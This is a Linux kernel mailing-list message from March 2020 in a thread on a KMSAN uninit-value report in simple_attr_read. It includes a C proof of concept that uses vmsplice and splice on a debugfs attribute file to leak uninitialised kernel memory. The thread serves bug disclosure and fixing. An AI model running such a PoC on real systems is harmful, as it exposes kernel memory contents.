Re: KMSAN: uninit-value in simple_attr_read

From: Alexander Potapenko
Date: Wed Mar 04 2020 - 09:36:39 EST

Next message: Mathias Nyman: "Re: [PATCH] xhci-mtk: Fix NULL pointer dereference with xhci_irq() for shared_hcd"
Previous message: Eric W. Biederman: "Re: [PATCH timers/core] posix-cpu-timers: Put the task_struct in posix_cpu_timers_create"
Next in thread: Eric Biggers: "[PATCH] libfs: fix infoleak in simple_attr_read()"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi Greg, Rafael, Arnd,

> This report says it's uninit in strlen, but there's actually an
> information leak later on that lets the user read arbitrary data past
> the non-terminated attr->get_buf.

The attached PoC demonstrates the problem.
I am not sure how bad is that, given that /sys/kernel/debug is usually
accessible only to the root, and simple attribute files don't seem to
be used anywhere else.
#define _GNU_SOURCE

#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#define BUF_SIZE 128
int main(int argc, char *argv[])
{
char buf[BUF_SIZE];
const char def_filename[] = "/sys/kernel/debug/bluetooth/6lowpan_enable";
char *filename = (char *)def_filename;
int pipefd[2], dfs_fd;
struct iovec iov;

if (argc > 1)
filename = argv[1];
pipe(pipefd);
iov.iov_base = mmap(NULL, 0x1000, 3, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
iov.iov_len = 0x1;
vmsplice(pipefd[1], &iov, 1, 1);
dfs_fd = open(filename, O_RDWR);
splice(pipefd[0], 0, dfs_fd, 0, 0x1, SPLICE_F_NONBLOCK);
memset(buf, 0, BUF_SIZE);
read(dfs_fd, buf, BUF_SIZE);
printf("'%s'\n", buf);
return 0;
}

Next message: Mathias Nyman: "Re: [PATCH] xhci-mtk: Fix NULL pointer dereference with xhci_irq() for shared_hcd"
Previous message: Eric W. Biederman: "Re: [PATCH timers/core] posix-cpu-timers: Put the task_struct in posix_cpu_timers_create"
Next in thread: Eric Biggers: "[PATCH] libfs: fix infoleak in simple_attr_read()"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]